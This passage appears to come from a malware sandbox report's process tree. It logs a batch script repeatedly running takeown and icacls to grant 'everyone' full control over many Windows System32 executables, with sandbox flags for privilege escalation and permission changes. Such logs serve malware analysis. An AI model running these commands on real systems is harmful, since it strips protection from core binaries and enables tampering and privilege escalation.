  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\bcastdvr.exe"
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\bcastdvr.exe"
    3⤵
    PID:4512
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\bcastdvr.exe" /grant "everyone":(f)
    3⤵
    PID:4588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\bitsadmin.exe"
  2⤵
  PID:6132
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\bitsadmin.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:4832
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\bitsadmin.exe" /grant "everyone":(f)
    3⤵
    PID:6120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\bootcfg.exe"
  2⤵
  PID:3344
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\bootcfg.exe"
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\bootcfg.exe" /grant "everyone":(f)
    3⤵
    PID:2816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\bthudtask.exe"
  2⤵
  PID:4896
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\bthudtask.exe"
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\bthudtask.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:6052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ByteCodeGenerator.exe"
  2⤵
  PID:2384
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\ByteCodeGenerator.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:1608
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\ByteCodeGenerator.exe" /grant "everyone":(f)
    3⤵
    PID:4324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cacls.exe"
  2⤵
  PID:4304
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cacls.exe"
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cacls.exe" /grant "everyone":(f)
    3⤵
    PID:6080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\calc.exe"
  2⤵
  PID:1528
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\calc.exe"
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\calc.exe" /grant "everyone":(f)
    3⤵
    PID:236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CameraSettingsUIHost.exe"
  2⤵
  PID:4904
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\CameraSettingsUIHost.exe"
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\CameraSettingsUIHost.exe" /grant "everyone":(f)
    3⤵
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CertEnrollCtrl.exe"
  2⤵
  PID:4360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\CertEnrollCtrl.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:5136
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\CertEnrollCtrl.exe" /grant "everyone":(f)
    3⤵
    PID:5144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\certreq.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\certreq.exe"
    3⤵
    PID:5984
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\certreq.exe" /grant "everyone":(f)
    3⤵
    PID:3940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\certutil.exe"
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\certutil.exe"
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\certutil.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:5992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\charmap.exe"
  2⤵
  PID:5952
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\charmap.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\charmap.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:4660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CheckNetIsolation.exe"
  2⤵
  PID:3740
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\CheckNetIsolation.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2696
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\CheckNetIsolation.exe" /grant "everyone":(f)
    3⤵
    PID:5976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\chkdsk.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3288
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\chkdsk.exe"
    3⤵
    - Modifies file permissions
    PID:2796
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\chkdsk.exe" /grant "everyone":(f)
    3⤵
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\chkntfs.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4092
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\chkntfs.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 228
      4⤵
      Program crash
      PID:5616
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\chkntfs.exe" /grant "everyone":(f)
    3⤵
    PID:2628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\choice.exe"
  2⤵
  PID:2312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\choice.exe"
    3⤵
    - Modifies file permissions
    PID:2144
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 376
      4⤵
      Program crash
      PID:412
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\choice.exe" /grant "everyone":(f)
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cipher.exe"
  2⤵
  PID:5532
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cipher.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 376
      4⤵
      Program crash
      PID:6080
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cipher.exe" /grant "everyone":(f)
    3⤵
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cleanmgr.exe"
  2⤵
  PID:236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cleanmgr.exe"
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 376
      4⤵
      Program crash
      PID:6136
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cleanmgr.exe" /grant "everyone":(f)
    3⤵
    PID:5104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cliconfg.exe"
  2⤵
  PID:5984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cliconfg.exe"
    3⤵
    PID:3180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3180 -s 220
      4⤵
      Program crash
      PID:5000
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cliconfg.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\clip.exe"
  2⤵
  PID:2872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\clip.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5960
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\clip.exe" /grant "everyone":(f)
    3⤵
    PID:3420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CloudNotifications.exe"
  2⤵
  PID:3424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\CloudNotifications.exe"
    3⤵
    PID:316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 316 -s 376
      4⤵
      Program crash
      PID:5600
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\CloudNotifications.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:3600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CloudStorageWizard.exe"
  2⤵
  PID:3724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\CloudStorageWizard.exe"
    3⤵
    PID:5252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 376
      4⤵
      Program crash
      PID:5480
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\CloudStorageWizard.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:5476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmd.exe"
  2⤵
  PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cmd.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:5852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cmd.exe" /grant "everyone":(f)
    3⤵
    PID:5616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmdkey.exe"
  2⤵
  PID:364
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cmdkey.exe"
    3⤵
    PID:4428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 376
      4⤵
      Program crash
      PID:5348
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1256
        5⤵
        Program crash
        
        PID:5904
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cmdkey.exe" /grant "everyone":(f)
    3⤵
    PID:5988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmdl32.exe"
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cmdl32.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5948
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cmdl32.exe" /grant "everyone":(f)
    3⤵
    PID:4296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmmon32.exe"
  2⤵
  PID:4848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cmmon32.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:1108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 220
      4⤵
      Program crash
      PID:3352
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cmmon32.exe" /grant "everyone":(f)
    3⤵
    PID:3876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmstp.exe"
  2⤵
  PID:3912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cmstp.exe"
    3⤵
    PID:5960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 380
      4⤵
      Program crash
      PID:5588
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cmstp.exe" /grant "everyone":(f)
    3⤵
    PID:832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\colorcpl.exe"
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\colorcpl.exe"
    3⤵
    PID:3604
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 380
      4⤵
      Program crash
      PID:3348
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\colorcpl.exe" /grant "everyone":(f)
    3⤵
    PID:1712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Com\comrepl.exe"
  2⤵
  PID:3624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\Com\comrepl.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:5140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 376
      4⤵
      Program crash
      PID:3476
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\Com\comrepl.exe" /grant "everyone":(f)
    3⤵
    PID:5724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Com\MigRegDB.exe"
  2⤵
  PID:5432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\Com\MigRegDB.exe"
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\Com\MigRegDB.exe" /grant "everyone":(f)
    3⤵
    PID:3720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\comp.exe"
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\comp.exe"
    3⤵
    PID:5456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 376
      4⤵
      Program crash
      PID:5924
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\comp.exe" /grant "everyone":(f)
    3⤵
    PID:4604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\compact.exe"
  2⤵
  PID:6036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\compact.exe"
    3⤵
    PID:212
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 376
      4⤵
      Program crash
      PID:4552
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\compact.exe" /grant "everyone":(f)
    3⤵
    PID:500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ComputerDefaults.exe"
  2⤵
  PID:4732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\ComputerDefaults.exe"
    3⤵
    PID:2924
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 380
      4⤵
      Program crash
      PID:2196
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\ComputerDefaults.exe" /grant "everyone":(f)
    3⤵
    PID:1572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\control.exe"
  2⤵
  PID:5956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\control.exe"
    3⤵
    PID:6120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 376
      4⤵
      Program crash
      PID:6008
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\control.exe" /grant "everyone":(f)
    3⤵
    PID:412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\convert.exe"
  2⤵
  PID:2960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\convert.exe"
    3⤵
    PID:4924
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 376
      4⤵
      Program crash
      PID:5860
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\convert.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:4292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\credwiz.exe"
  2⤵
  PID:2300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\credwiz.exe"
    3⤵
    PID:1744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 376
      4⤵
      Program crash
      PID:6064
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\credwiz.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - System Location Discovery: System Language Discovery
    PID:5028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cscript.exe"
  2⤵
  PID:3804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cscript.exe"
    3⤵
    PID:3492
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 376
      4⤵
      Program crash
      PID:1128
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cscript.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ctfmon.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\ctfmon.exe"
    3⤵
    PID:4944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 380
      4⤵
      Program crash
      PID:3712
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\ctfmon.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:3896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cttune.exe"
  2⤵
  PID:3668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cttune.exe"
    3⤵
    PID:3684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 376
      4⤵
      Program crash
      PID:1404
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cttune.exe" /grant "everyone":(f)
    3⤵
    PID:5480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cttunesvr.exe"
  2⤵
  PID:2192
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\cttunesvr.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 376
      4⤵
      Program crash
      PID:5172
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\cttunesvr.exe" /grant "everyone":(f)
    3⤵
    PID:5712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dccw.exe"
  2⤵
  PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\dccw.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:3720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 376
      4⤵
      Program crash
      PID:3672
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\dccw.exe" /grant "everyone":(f)
    3⤵
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dcomcnfg.exe"
  2⤵
  PID:5484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\dcomcnfg.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:4604
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 376
      4⤵
      Program crash
      PID:5472
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\dcomcnfg.exe" /grant "everyone":(f)
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ddodiag.exe"
  2⤵
  PID:668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\ddodiag.exe"
    3⤵
    PID:5816
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 220
      4⤵
      Program crash
      PID:5840
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\ddodiag.exe" /grant "everyone":(f)
    3⤵
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\DevicePairingWizard.exe"
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\DevicePairingWizard.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:1608
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\DevicePairingWizard.exe" /grant "everyone":(f)
    3⤵
    PID:6084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dfrgui.exe"
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\dfrgui.exe"
    3⤵
    PID:5804
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 376
      4⤵
      Program crash
      PID:6024
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\dfrgui.exe" /grant "everyone":(f)
    3⤵
    PID:4188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dialer.exe"
  2⤵
  PID:5952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\dialer.exe"
    3⤵
    PID:4808
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 376
      4⤵
      Program crash
      PID:4068
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\dialer.exe" /grant "everyone":(f)
    3⤵
    PID:2584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\diskpart.exe"
  2⤵
  PID:164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\diskpart.exe"
    3⤵
    - Modifies file permissions
    PID:2040
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 376
      4⤵
      Program crash
      PID:5560
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\diskpart.exe" /grant "everyone":(f)
    3⤵
    PID:4552
- C:\Windows\SysWOW64\cmd.exe
